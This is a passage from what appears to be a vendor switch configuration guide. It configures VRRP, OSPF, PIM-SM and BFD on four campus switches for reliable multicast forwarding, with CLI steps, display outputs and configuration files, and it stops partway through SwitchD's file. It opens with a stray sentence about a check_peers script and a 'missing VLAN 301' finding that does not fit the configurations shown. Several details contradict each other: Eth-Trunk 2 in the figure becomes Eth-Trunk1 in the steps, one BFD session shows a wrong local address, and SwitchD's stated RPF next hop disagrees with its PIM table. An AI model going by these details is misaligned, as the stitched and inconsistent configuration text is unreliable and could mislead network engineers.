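Run it on the two complete files with check_peers(parse_config(file_a), parse_config(file_b)); the sample pair yields exactly one finding, the missing VLAN 301 on SwitchB's Eth-Trunk, and none once that line reads 301 to 305.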

11.1.5 Example for Configuring VRRP to Ensure Reliable Multicast Data Transmission

VRRP Overview
Generally, all hosts on the same network segment have the same default route with the
gateway address as the next hop address. The hosts use the default route to send packets to the
gateway and the gateway forwards the packets to other network segments. When the gateway
fails, the hosts with the same default route cannot communicate with external networks.
Configuring multiple egress gateways is a commonly used method to improve system
reliability. However, route selection between the gateways becomes an issue.

VRRP solves the problem. VRRP virtualizes multiple routing devices into a virtual router
without changing the networking, and uses the virtual router IP address as the default gateway
address to implement gateway backup. When the gateway fails, VRRP selects a new gateway
to transmit service traffic to ensure reliable communication.

Configuration Notes
l VRRP groups must use different virtual IP addresses. The virtual IP address of a VRRP
group must be on the same network segment as the IP address of the interface where the
VRRP group is configured.
l Ensure that each device of the same VRRP group is configured with the same VRID.

Networking Requirements
As shown in Figure 11-5, SwitchA and SwitchB are egress gateways of the campus network;
SwitchC and SwitchD are core switches. The multicast source connects to the campus
network through a router. Key nodes on the network work in redundancy mode to improve
network reliability, and the egress gateways and core switches are fully meshed to implement
link redundancy. The egress gateways and core switches must be configured to enable
multicast data to be reliably transmitted to the downstream network.

NOTE

In this scenario, ensure that all connected interfaces have STP disabled. If STP is enabled and VLANIF
interfaces of switches are used to construct a Layer 3 ring network, an interface on the network may be
blocked. As a result, Layer 3 services on the network cannot run normally.

Figure 11-5 Transmitting multicast data over a VRRP network

[Figure not reproduced. Topology, top to bottom: the multicast Source, the IP network, the campus egress (SwitchA and SwitchB), the core layer (SwitchC and SwitchD), the aggregation layer, the access layer, and HostA and HostB at the application layer.
l Campus egress: SwitchA and SwitchB run VRRP VRID 1 (virtual IP address 10.1.1.253) and VRID 2 (virtual IP address 10.1.1.254); LoopBack1 is 10.10.1.1/32 on SwitchA and 10.2.2.2/32 on SwitchB; an Eth-Trunk over GE2/0/1, GE2/0/2, and GE2/0/3 connects the two.
l Core layer: SwitchC and SwitchD run VRRP VRID 1 (virtual IP address 10.1.6.253) and VRID 2 (virtual IP address 10.1.6.254); LoopBack1 is 10.3.3.3/32 on SwitchC and 10.4.4.4/32 on SwitchD; an Eth-Trunk over GE2/0/1, GE2/0/2, and GE2/0/3 connects the two.
l The egress gateways and core switches are fully meshed over their GE3/0/1 and GE3/0/2 interfaces; the interfaces, VLANs, and addresses are listed in the table below.]

Device | Interface | VLAN | VLANIF Interface IP Address
SwitchA | GE1/0/0 | VLAN 100 | 10.1.1.1/24
SwitchA | Eth-Trunk 1 (member interfaces GE2/0/1, GE2/0/2, and GE2/0/3) | VLAN 200 | No VLANIF interface
SwitchA | GE3/0/1 | VLAN 301 | 10.1.2.1/24
SwitchA | GE3/0/2 | VLAN 302 | 10.1.3.1/24
SwitchB | GE1/0/0 | VLAN 100 | 10.1.1.2/24
SwitchB | Eth-Trunk 1 (member interfaces GE2/0/1, GE2/0/2, and GE2/0/3) | VLAN 200 | No VLANIF interface
SwitchB | GE3/0/1 | VLAN 303 | 10.1.4.1/24
SwitchB | GE3/0/2 | VLAN 304 | 10.1.5.1/24
SwitchC | GE1/0/0 | VLAN 400 | 10.1.6.1/24
SwitchC | Eth-Trunk 2 (member interfaces GE2/0/1, GE2/0/2, and GE2/0/3) | VLAN 500 | No VLANIF interface
SwitchC | GE3/0/1 | VLAN 301 | 10.1.2.2/24
SwitchC | GE3/0/2 | VLAN 304 | 10.1.5.2/24
SwitchD | GE1/0/0 | VLAN 400 | 10.1.6.2/24
SwitchD | Eth-Trunk 2 (member interfaces GE2/0/1, GE2/0/2, and GE2/0/3) | VLAN 500 | No VLANIF interface
SwitchD | GE3/0/1 | VLAN 303 | 10.1.4.2/24
SwitchD | GE3/0/2 | VLAN 302 | 10.1.3.2/24

Configuration Roadmap
To ensure reliable multicast data transmission, configure the Virtual Router Redundancy
Protocol (VRRP) and Bidirectional Forwarding Detection (BFD) on the egress gateways and
core switches. To ensure normal multicast forwarding, configure a multicast protocol on the
egress gateways and core switches.
1. Configure link aggregation groups between SwitchA and SwitchB, and between SwitchC
and SwitchD to ensure fast and reliable exchange of VRRP packets.
2. Create VLANs on the switches and add their interfaces to respective VLANs. Configure
IP addresses for the corresponding VLANIF interfaces to make local network segments
reachable.
3. Configure the Open Shortest Path First (OSPF) protocol on the switches to ensure reachable routes between them. OSPF routes load balance unicast traffic between the egress gateways and core switches to reduce loads of links that transmit multicast and unicast data simultaneously.
4. Configure a VRRP group between SwitchA and SwitchB and a VRRP group between
SwitchC and SwitchD to ensure reliable multicast forwarding. The VRRP groups
implement load balancing for unicast traffic to reduce loads of links that transmit
multicast and unicast data simultaneously.
5. Configure a multicast protocol on the switches to ensure normal multicast data
forwarding.
6. Configure BFD for OSPF and BFD for PIM on the switches to enable the switches to
quickly detect link failures, realizing fast convergence of unicast and multicast routes.

Procedure
1. Configure link aggregation groups on the switches.
# Create Eth-Trunks and add member interfaces to the Eth-Trunks on the campus egress
gateway and core devices.
<SwitchA> system-view
[SwitchA] interface Eth-Trunk1 //Create Eth-Trunk1 and bind member
interfaces GE2/0/1 through GE2/0/3 to it.
[SwitchA-Eth-Trunk1] trunkport gigabitethernet 2/0/1 to 2/0/3
[SwitchA-Eth-Trunk1] quit
<SwitchB> system-view
[SwitchB] interface Eth-Trunk1 //Create Eth-Trunk1 and bind member
interfaces GE2/0/1 through GE2/0/3 to it.
[SwitchB-Eth-Trunk1] trunkport gigabitethernet 2/0/1 to 2/0/3
[SwitchB-Eth-Trunk1] quit
<SwitchC> system-view
[SwitchC] interface Eth-Trunk1 //Create Eth-Trunk1 and bind member
interfaces GE2/0/1 through GE2/0/3 to it.
[SwitchC-Eth-Trunk1] trunkport gigabitethernet 2/0/1 to 2/0/3
[SwitchC-Eth-Trunk1] quit
<SwitchD> system-view
[SwitchD] interface Eth-Trunk1 //Create Eth-Trunk1 and bind member
interfaces GE2/0/1 through GE2/0/3 to it.
[SwitchD-Eth-Trunk1] trunkport gigabitethernet 2/0/1 to 2/0/3
[SwitchD-Eth-Trunk1] quit

By default, an Eth-Trunk works in manual load balancing mode, and all active interfaces
load balance traffic.
2. Create VLANs, add interfaces to respective VLANs, and configure IP addresses for
corresponding VLANIF interfaces.
a. Create VLANs and add interfaces to the VLANs on the campus egress gateway and
core devices. The configurations on SwitchB, SwitchC, and SwitchD are similar to
the configuration on SwitchA, and are not mentioned here.
[SwitchA] vlan batch 100 200 301 302
[SwitchA] interface gigabitethernet 1/0/0
[SwitchA-GigabitEthernet1/0/0] port link-type trunk //Set the link type of the interface to trunk, which is not the default link type.
[SwitchA-GigabitEthernet1/0/0] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet1/0/0] quit
[SwitchA] interface gigabitethernet 3/0/1
[SwitchA-GigabitEthernet3/0/1] port link-type trunk //Set the link type of the interface to trunk, which is not the default link type.
[SwitchA-GigabitEthernet3/0/1] port trunk allow-pass vlan 301
[SwitchA-GigabitEthernet3/0/1] quit
[SwitchA] interface gigabitethernet 3/0/2
[SwitchA-GigabitEthernet3/0/2] port link-type trunk //Set the link type of the interface to trunk, which is not the default link type.
[SwitchA-GigabitEthernet3/0/2] port trunk allow-pass vlan 302
[SwitchA-GigabitEthernet3/0/2] quit
[SwitchA] interface eth-trunk 1
[SwitchA-Eth-Trunk1] port link-type trunk //Set the link type of the interface to trunk, which is not the default link type.
[SwitchA-Eth-Trunk1] port trunk allow-pass vlan 200
[SwitchA-Eth-Trunk1] quit

b. Configure IP addresses for Layer 3 interfaces on the campus egress gateway and
core devices. The configurations on SwitchB, SwitchC, and SwitchD are similar to
the configuration on SwitchA, and are not mentioned here.
[SwitchA] interface vlanif 100 //Create VLANIF100.
[SwitchA-Vlanif100] ip address 10.1.1.1 24
[SwitchA-Vlanif100] quit
[SwitchA] interface vlanif 301 //Create VLANIF301.
[SwitchA-Vlanif301] ip address 10.1.2.1 24
[SwitchA-Vlanif301] quit
[SwitchA] interface vlanif 302 //Create VLANIF302.
[SwitchA-Vlanif302] ip address 10.1.3.1 24
[SwitchA-Vlanif302] quit
[SwitchA] interface loopback 1 //Create LoopBack1.
[SwitchA-LoopBack1] ip address 10.10.1.1 32
[SwitchA-LoopBack1] quit

3. Configure OSPF.
# Enable OSPF on the campus egress gateway and core devices, add the devices to area
0, and advertise local network segments in area 0. The configurations on SwitchB,
SwitchC, and SwitchD are similar to the configuration on SwitchA, and are not
mentioned here.
[SwitchA] ospf
[SwitchA-ospf-1] area 0
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255 //Specify that the interface running OSPF is the one connected to the 10.1.1.0 network segment and that the interface belongs to Area 0.
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.2.0 0.0.0.255 //Specify that the interface running OSPF is the one connected to the 10.1.2.0 network segment and that the interface belongs to Area 0.
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.3.0 0.0.0.255 //Specify that the interface running OSPF is the one connected to the 10.1.3.0 network segment and that the interface belongs to Area 0.
[SwitchA-ospf-1-area-0.0.0.0] network 10.10.1.1 0.0.0.0 //Specify that the interface running OSPF is the one connected to the 10.10.1.1 network segment and that the interface belongs to Area 0.
[SwitchA-ospf-1-area-0.0.0.0] quit
[SwitchA-ospf-1] quit

4. Configure VRRP groups.
a. Create VRRP group 1 on campus egress gateway devices SwitchA and SwitchB.
Set the priority of SwitchA to 120 and the preemption delay to 20 seconds. Retain
the default priority of SwitchB. Therefore, SwitchA becomes the master device and
SwitchB becomes the backup device of VRRP group 1.
# Configure SwitchA.
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] vrrp vrid 1 virtual-ip 10.1.1.253 //Create VRRP group 1 on VLANIF100 and set the virtual IP address of the VRRP group to 10.1.1.253.
[SwitchA-Vlanif100] vrrp vrid 1 priority 120 //Set the priority of VLANIF100 in VRRP group 1 to 120.
[SwitchA-Vlanif100] vrrp vrid 1 preempt-mode timer delay 20 //Set the preemption delay of VLANIF100 in VRRP group 1 to 20 seconds.
[SwitchA-Vlanif100] quit

# Configure SwitchB.
[SwitchB] interface vlanif 100
[SwitchB-Vlanif100] vrrp vrid 1 virtual-ip 10.1.1.253 //Create VRRP group 1 on VLANIF100 and set the virtual IP address of the VRRP group to 10.1.1.253.
[SwitchB-Vlanif100] quit

b. Create VRRP group 2 on campus egress gateway devices SwitchA and SwitchB.
Set the priority of SwitchB to 120 and the preemption delay to 20 seconds. Retain
the default priority of SwitchA. Therefore, SwitchB becomes the master device and
SwitchA becomes the backup device of VRRP group 2.
# Configure SwitchA.
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] vrrp vrid 2 virtual-ip 10.1.1.254 //Create VRRP group 2 on VLANIF100 and set the virtual IP address of the VRRP group to 10.1.1.254.
[SwitchA-Vlanif100] quit

# Configure SwitchB.
[SwitchB] interface vlanif 100
[SwitchB-Vlanif100] vrrp vrid 2 virtual-ip 10.1.1.254 //Create VRRP group 2 on VLANIF100 and set the virtual IP address of the VRRP group to 10.1.1.254.
[SwitchB-Vlanif100] vrrp vrid 2 priority 120 //Set the priority of VLANIF100 in VRRP group 2 to 120.
[SwitchB-Vlanif100] vrrp vrid 2 preempt-mode timer delay 20 //Set the preemption delay of VLANIF100 in VRRP group 2 to 20 seconds.
[SwitchB-Vlanif100] quit

The configurations on SwitchC and SwitchD are similar to the configurations on
SwitchA and SwitchB, and are not mentioned here.
5. Configure a multicast protocol.
a. Enable multicast routing on the campus egress gateway and core devices, and
enable PIM-SM on their Layer 3 interfaces. Enable IGMP on user-side interfaces of
the core devices.
# Configure SwitchA.
[SwitchA] multicast routing-enable //Enable multicast routing globally.
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] pim sm //Enable PIM-SM on VLANIF100.
[SwitchA-Vlanif100] quit
[SwitchA] interface vlanif 301
[SwitchA-Vlanif301] pim sm //Enable PIM-SM on VLANIF301.
[SwitchA-Vlanif301] quit
[SwitchA] interface vlanif 302
[SwitchA-Vlanif302] pim sm //Enable PIM-SM on VLANIF302.
[SwitchA-Vlanif302] quit
[SwitchA] interface loopback 1
[SwitchA-LoopBack1] pim sm //Enable PIM-SM on LoopBack1.
[SwitchA-LoopBack1] quit

# Configure SwitchB.
[SwitchB] multicast routing-enable //Enable multicast routing globally.
[SwitchB] interface vlanif 100
[SwitchB-Vlanif100] pim sm //Enable PIM-SM on VLANIF100.
[SwitchB-Vlanif100] quit
[SwitchB] interface vlanif 303
[SwitchB-Vlanif303] pim sm //Enable PIM-SM on VLANIF303.
[SwitchB-Vlanif303] quit
[SwitchB] interface vlanif 304
[SwitchB-Vlanif304] pim sm //Enable PIM-SM on VLANIF304.
[SwitchB-Vlanif304] quit
[SwitchB] interface loopback 1
[SwitchB-LoopBack1] pim sm //Enable PIM-SM on LoopBack1.
[SwitchB-LoopBack1] quit

# Configure SwitchC.
[SwitchC] multicast routing-enable //Enable multicast routing globally.
[SwitchC] interface vlanif 400
[SwitchC-Vlanif400] pim sm //Enable PIM-SM on VLANIF400.
[SwitchC-Vlanif400] igmp enable //Enable IGMP on VLANIF400.
[SwitchC-Vlanif400] quit
[SwitchC] interface vlanif 301
[SwitchC-Vlanif301] pim sm //Enable PIM-SM on VLANIF301.
[SwitchC-Vlanif301] quit
[SwitchC] interface vlanif 304
[SwitchC-Vlanif304] pim sm //Enable PIM-SM on VLANIF304.
[SwitchC-Vlanif304] quit
[SwitchC] interface loopback 1
[SwitchC-LoopBack1] pim sm //Enable PIM-SM on LoopBack1.
[SwitchC-LoopBack1] quit

# Configure SwitchD.
[SwitchD] multicast routing-enable //Enable multicast routing globally.
[SwitchD] interface vlanif 400
[SwitchD-Vlanif400] pim sm //Enable PIM-SM on VLANIF400.
[SwitchD-Vlanif400] igmp enable //Enable IGMP on VLANIF400.
[SwitchD-Vlanif400] quit
[SwitchD] interface vlanif 302
[SwitchD-Vlanif302] pim sm //Enable PIM-SM on VLANIF302.
[SwitchD-Vlanif302] quit
[SwitchD] interface vlanif 303
[SwitchD-Vlanif303] pim sm //Enable PIM-SM on VLANIF303.
[SwitchD-Vlanif303] quit
[SwitchD] interface loopback 1
[SwitchD-LoopBack1] pim sm //Enable PIM-SM on LoopBack1.
[SwitchD-LoopBack1] quit

b. Configure the dynamic RP function on the core devices SwitchC and SwitchD that
aggregate multicast traffic.
# Configure Loopback1 of SwitchC as a C-BSR and a C-RP.
[SwitchC] pim
[SwitchC-pim] c-bsr loopback 1 //Configure Loopback1 as a C-BSR interface.
[SwitchC-pim] c-rp loopback 1 //Configure Loopback1 as a C-RP interface.
[SwitchC-pim] quit

# Configure Loopback1 of SwitchD as a C-BSR and a C-RP.
[SwitchD] pim
[SwitchD-pim] c-bsr loopback 1 //Configure Loopback1 as a C-BSR interface.
[SwitchD-pim] c-rp loopback 1 //Configure Loopback1 as a C-RP interface.
[SwitchD-pim] quit

6. Configure BFD.
a. Enable global BFD on the campus egress gateway and core devices. Global BFD
must be enabled before you configure BFD for OSPF and BFD for PIM. The
configurations on SwitchB, SwitchC, and SwitchD are similar to the configuration
on SwitchA, and are not mentioned here.
[SwitchA] bfd //Enable BFD globally.
[SwitchA-bfd] quit

b. Enable BFD for OSPF on the campus egress gateway and core devices. The
configurations on SwitchB, SwitchC, and SwitchD are similar to the configuration
on SwitchA, and are not mentioned here.
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] ospf bfd enable //Enable BFD for OSPF on VLANIF100.
[SwitchA-Vlanif100] quit
[SwitchA] interface vlanif 301
[SwitchA-Vlanif301] ospf bfd enable //Enable BFD for OSPF on VLANIF301.
[SwitchA-Vlanif301] quit
[SwitchA] interface vlanif 302
[SwitchA-Vlanif302] ospf bfd enable //Enable BFD for OSPF on VLANIF302.
[SwitchA-Vlanif302] quit

c. Enable BFD for PIM on the campus egress gateway and core devices. The
configurations on SwitchB, SwitchC, and SwitchD are similar to the configuration
on SwitchA, and are not mentioned here.
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] pim bfd enable //Enable BFD for PIM on VLANIF100.
[SwitchA-Vlanif100] quit
[SwitchA] interface vlanif 301
[SwitchA-Vlanif301] pim bfd enable //Enable BFD for PIM on VLANIF301.
[SwitchA-Vlanif301] quit
[SwitchA] interface vlanif 302
[SwitchA-Vlanif302] pim bfd enable //Enable BFD for PIM on VLANIF302.
[SwitchA-Vlanif302] quit

7. Verify the configuration.
– Verify the configuration of link aggregation.
# Run the display eth-trunk 1 command on SwitchA. The command output shows
that Eth-Trunk 1 has three member interfaces: GigabitEthernet2/0/1,
GigabitEthernet2/0/2, and GigabitEthernet2/0/3. All the member interfaces are Up.
[SwitchA] display eth-trunk 1
Eth-Trunk1's state information is:
WorkingMode: NORMAL             Hash arithmetic: According to SIP-XOR-DIP
Least Active-linknumber: 1      Max Bandwidth-affected-linknumber: 8
Operate status: up              Number Of Up Ports In Trunk: 3
--------------------------------------------------------------------------------
PortName                      Status      Weight
GigabitEthernet2/0/1          Up          1
GigabitEthernet2/0/2          Up          1
GigabitEthernet2/0/3          Up          1

The display eth-trunk 1 command outputs on SwitchB, SwitchC, and SwitchD are
similar to the command output on SwitchA.
– Verify the VRRP configuration.
# Run the display vrrp command on SwitchA. The command output shows that
SwitchA is the master device in VRRP group 1 and the backup device in VRRP
group 2.
[SwitchA] display vrrp
Vlanif100 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.253
Master IP : 10.1.1.1
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-12-31 10:34:23 UTC-08:00
Last change time : 2012-12-31 10:34:26 UTC-08:00

Vlanif100 | Virtual Router 2
State : Backup
Virtual IP : 10.1.1.254
Master IP : 10.1.1.2
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0102
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-12-31 10:35:39 UTC-08:00
Last change time : 2012-12-31 10:35:43 UTC-08:00
# Run the display vrrp command on SwitchB. The command output shows that
SwitchB is the backup device in VRRP group 1 and the master device in VRRP
group 2.
[SwitchB] display vrrp
Vlanif100 | Virtual Router 1
State : Backup
Virtual IP : 10.1.1.253
Master IP : 10.1.1.1
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-12-31 10:34:23 UTC-08:00
Last change time : 2012-12-31 10:34:26 UTC-08:00

Vlanif100 | Virtual Router 2
State : Master
Virtual IP : 10.1.1.254
Master IP : 10.1.1.2
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0102
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-12-31 10:35:39 UTC-08:00
Last change time : 2012-12-31 10:35:43 UTC-08:00
The display vrrp command outputs on SwitchC and SwitchD are similar to the
command outputs on SwitchA and SwitchB.
– Verify the OSPF configuration.
# Run the display ip routing-table command on SwitchA. The command output
shows that there are two IP routes to 10.1.6.0/24, implementing load balancing of
unicast traffic.
[SwitchA] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 15 Routes : 18

Destination/Mask    Proto   Pre  Cost  Flags  NextHop        Interface

10.1.1.0/24         Direct  0    0     D      10.1.1.1       Vlanif100
10.1.1.1/32         Direct  0    0     D      127.0.0.1      Vlanif100
10.1.1.253/32       Direct  0    0     D      127.0.0.1      Vlanif100
10.1.1.254/32       Direct  0    0     D      127.0.0.1      Vlanif100
10.1.2.0/24         Direct  0    0     D      10.1.2.1       Vlanif301
10.1.2.1/32         Direct  0    0     D      127.0.0.1      Vlanif301
10.1.3.0/24         Direct  0    0     D      10.1.3.1       Vlanif302
10.1.3.1/32         Direct  0    0     D      127.0.0.1      Vlanif302
10.1.4.0/24         OSPF    10   2     D      10.1.3.2       Vlanif302
10.1.5.0/24         OSPF    10   2     D      10.1.2.2       Vlanif301
10.1.6.0/24         OSPF    10   2     D      10.1.2.2       Vlanif301
                    OSPF    10   2     D      10.1.3.2       Vlanif302
10.1.6.253/32       OSPF    10   2     D      10.1.2.2       Vlanif301
                    OSPF    10   2     D      10.1.3.2       Vlanif302
10.1.6.254/32       OSPF    10   2     D      10.1.3.2       Vlanif302
                    OSPF    10   2     D      10.1.2.2       Vlanif301
127.0.0.0/8         Direct  0    0     D      127.0.0.1      InLoopBack0
127.0.0.1/32        Direct  0    0     D      127.0.0.1      InLoopBack0

The display ip routing-table command outputs on SwitchB, SwitchC, and
SwitchD are similar to the command output on SwitchA.
– Verify PIM-SM configuration.
Multicast source 10.100.1.1 sends multicast data to group 225.0.0.10, and user hosts
have joined group 225.0.0.10.
# Run the display pim routing-table command on SwitchB and SwitchD. The
command output shows that PIM routing entries have been created for group
225.0.0.10.
NOTE
SwitchB and SwitchD implement multicast routing as follows:
l According to the dynamic RP election rules, if the C-RP interfaces have the same IP address
mask, priority, and hash calculation result, the C-RP interface with the larger IP address
becomes the RP. Therefore, Loopback1 of SwitchD becomes the RP interface.
l According to the reverse path forwarding (RPF) check rules, if two equal-cost optimal routes
are available in the IP routing table, the one with the larger next hop address is selected as
the RPF route. Therefore, SwitchD selects the route with the next hop address 10.1.5.1 as
the RPF route to the destination network segment 10.1.1.0/24.
[SwitchB] display pim routing-table
VPN-Instance: public net
Total 0 (*, G) entry; 1 (S, G) entry

(10.100.1.1, 225.0.0.10)
RP: 10.4.4.4
Protocol: pim-sm, Flag: SPT ACT
UpTime: 00:00:42
Upstream interface: Vlanif100
Upstream neighbor: 10.1.1.3
RPF prime neighbor: 10.1.1.3
Downstream interface(s) information:
Total number of downstreams: 1
1: Vlanif303
Protocol: pim-sm, UpTime: 00:00:42, Expires:-
[SwitchD] display pim routing-table
VPN-Instance: public net
Total 0 (*, G) entry; 1 (S, G) entry

(10.100.1.1, 225.0.0.10)
RP: 10.4.4.4
Protocol: pim-sm, Flag: SPT ACT
UpTime: 00:00:42
Upstream interface: Vlanif303
Upstream neighbor: 10.1.4.1
RPF prime neighbor: 10.1.4.1
Downstream interface(s) information:
Total number of downstreams: 1
1: Vlanif400
Protocol: pim-sm, UpTime: 00:00:42, Expires:-

– Verify the BFD configuration.
# Run the display ospf bfd session all command on SwitchA. The command output
shows that OSPF BFD sessions have been successfully set up.
[SwitchA] display ospf bfd session all
OSPF Process 1 with Router ID 10.10.1.1

Area 0.0.0.0 interface 10.1.1.1(Vlanif100)'s BFD Sessions

NeighborId:10.2.2.2 AreaId:0.0.0.0 Interface: Vlanif100
BFDState:up rx :1000 tx :1000
Multiplier:3 BFD Local Dis:8196 LocalIpAdd:10.1.1.1
RemoteIpAdd:10.1.1.2 Diagnostic Info:No diagnostic information

Area 0.0.0.0 interface 10.1.1.1(Vlanif100)'s BFD Sessions

NeighborId:5.5.5.5 AreaId:0.0.0.0 Interface: Vlanif100
BFDState:up rx :1000 tx :1000
Multiplier:4 BFD Local Dis:8195 LocalIpAdd:10.1.1.1
RemoteIpAdd:10.1.1.3 Diagnostic Info:No diagnostic information

Area 0.0.0.0 interface 10.1.2.1(Vlanif301)'s BFD Sessions

NeighborId:10.3.3.3 AreaId:0.0.0.0 Interface: Vlanif301
BFDState:up rx :1000 tx :1000
Multiplier:3 BFD Local Dis:8194 LocalIpAdd:10.1.1.1
RemoteIpAdd:10.1.2.2 Diagnostic Info:No diagnostic information

Area 0.0.0.0 interface 10.1.3.1(Vlanif302)'s BFD Sessions

NeighborId:10.4.4.4 AreaId:0.0.0.0 Interface: Vlanif302
BFDState:up rx :1000 tx :1000
Multiplier:3 BFD Local Dis:8193 LocalIpAdd:10.1.1.1
RemoteIpAdd:10.1.3.2 Diagnostic Info:No diagnostic information

The display ospf bfd session all command outputs on SwitchB, SwitchC, and
SwitchD are similar to the command output on SwitchA.

# Run the display pim bfd session command on SwitchA. The command output
shows that PIM BFD sessions have been successfully set up.
[SwitchA] display pim bfd session
VPN-Instance: public net
Total 4 BFD session Created

Vlanif100 (10.1.1.1): Total 2 BFD session Created

Neighbor        ActTx(ms)  ActRx(ms)  ActMulti  Local/Remote  State
10.1.1.2        1000       1000       3         8192/8192     Up
10.1.1.3        1000       1000       3         8191/8191     Up

Vlanif301 (10.1.2.1): Total 1 BFD session Created

Neighbor        ActTx(ms)  ActRx(ms)  ActMulti  Local/Remote  State
10.1.2.2        1000       1000       3         8193/8193     Up

Vlanif302 (10.1.3.1): Total 1 BFD session Created

Neighbor        ActTx(ms)  ActRx(ms)  ActMulti  Local/Remote  State
10.1.3.2        1000       1000       3         8194/8194     Up
The display pim bfd session command outputs on SwitchB, SwitchC, and SwitchD
are similar to the command output on SwitchA.

Configuration Files
l Configuration file of campus egress gateway SwitchA
#
sysname SwitchA
#
vlan batch 100 200 301 to 302
#
multicast routing-enable
#
bfd
#
interface Vlanif100
ip address 10.1.1.1 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.1.253
vrrp vrid 1 priority 120
vrrp vrid 1 preempt-mode timer delay 20
vrrp vrid 2 virtual-ip 10.1.1.254
pim sm
pim bfd enable
ospf bfd enable
#
interface Vlanif301
ip address 10.1.2.1 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#
interface Vlanif302
ip address 10.1.3.1 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#
interface Eth-Trunk1
port link-type trunk
port trunk allow-pass vlan 200
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet2/0/1
eth-trunk 1
#
interface GigabitEthernet2/0/2
eth-trunk 1
#
interface GigabitEthernet2/0/3
eth-trunk 1
#
interface GigabitEthernet3/0/1
port link-type trunk
port trunk allow-pass vlan 301
#
interface GigabitEthernet3/0/2
port link-type trunk
port trunk allow-pass vlan 302
#
interface LoopBack1
ip address 10.10.1.1 255.255.255.255
pim sm
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.1.2.0 0.0.0.255
network 10.1.3.0 0.0.0.255
network 10.10.1.1 0.0.0.0
#
return
l Configuration file of campus egress gateway SwitchB
#
sysname SwitchB
#
vlan batch 100 200 303 to 304
#
multicast routing-enable
#
bfd
#
interface Vlanif100
ip address 10.1.1.2 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.1.253
vrrp vrid 2 virtual-ip 10.1.1.254
vrrp vrid 2 priority 120
vrrp vrid 2 preempt-mode timer delay 20
pim sm
pim bfd enable
ospf bfd enable
#
interface Vlanif303
ip address 10.1.4.1 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#
interface Vlanif304
ip address 10.1.5.1 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#
interface Eth-Trunk1
port link-type trunk
port trunk allow-pass vlan 200
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet2/0/1
eth-trunk 1
#
interface GigabitEthernet2/0/2
eth-trunk 1
#
interface GigabitEthernet2/0/3
eth-trunk 1
#
interface GigabitEthernet3/0/1
port link-type trunk
port trunk allow-pass vlan 303
#
interface GigabitEthernet3/0/2
port link-type trunk
port trunk allow-pass vlan 304
#
interface LoopBack1
ip address 10.2.2.2 255.255.255.255
pim sm
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.1.4.0 0.0.0.255
network 10.1.5.0 0.0.0.255
network 10.2.2.2 0.0.0.0
#
return
l Configuration file of core device SwitchC
#
sysname SwitchC
#
vlan batch 301 304 400 500
#
multicast routing-enable
#
bfd
#
interface Vlanif301
ip address 10.1.2.2 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#
interface Vlanif304
ip address 10.1.5.2 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#
interface Vlanif400
ip address 10.1.6.1 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.6.253
vrrp vrid 1 priority 120
vrrp vrid 1 preempt-mode timer delay 20
vrrp vrid 2 virtual-ip 10.1.6.254
pim sm
pim bfd enable
igmp enable
ospf bfd enable
#
interface Eth-Trunk1
port link-type trunk
port trunk allow-pass vlan 500
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 400
stp disable
#
interface GigabitEthernet2/0/1
eth-trunk 1
#
interface GigabitEthernet2/0/2
eth-trunk 1
#
interface GigabitEthernet2/0/3
eth-trunk 1
#
interface GigabitEthernet3/0/1
port link-type trunk
port trunk allow-pass vlan 301
#
interface GigabitEthernet3/0/2
port link-type trunk
port trunk allow-pass vlan 304
#
interface LoopBack1
ip address 10.3.3.3 255.255.255.255
pim sm
#
ospf 1
area 0.0.0.0
network 10.1.2.0 0.0.0.255
network 10.1.5.0 0.0.0.255
network 10.1.6.0 0.0.0.255
network 10.3.3.3 0.0.0.0
#
pim
c-bsr LoopBack1
c-rp LoopBack1
#
return
l Configuration file of core device SwitchD
#
sysname SwitchD
#
vlan batch 302 to 303 400 500
#
multicast routing-enable
#
bfd
#
interface Vlanif302
ip address 10.1.3.2 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#
interface Vlanif303
ip address 10.1.4.2 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#
interface Vlanif400
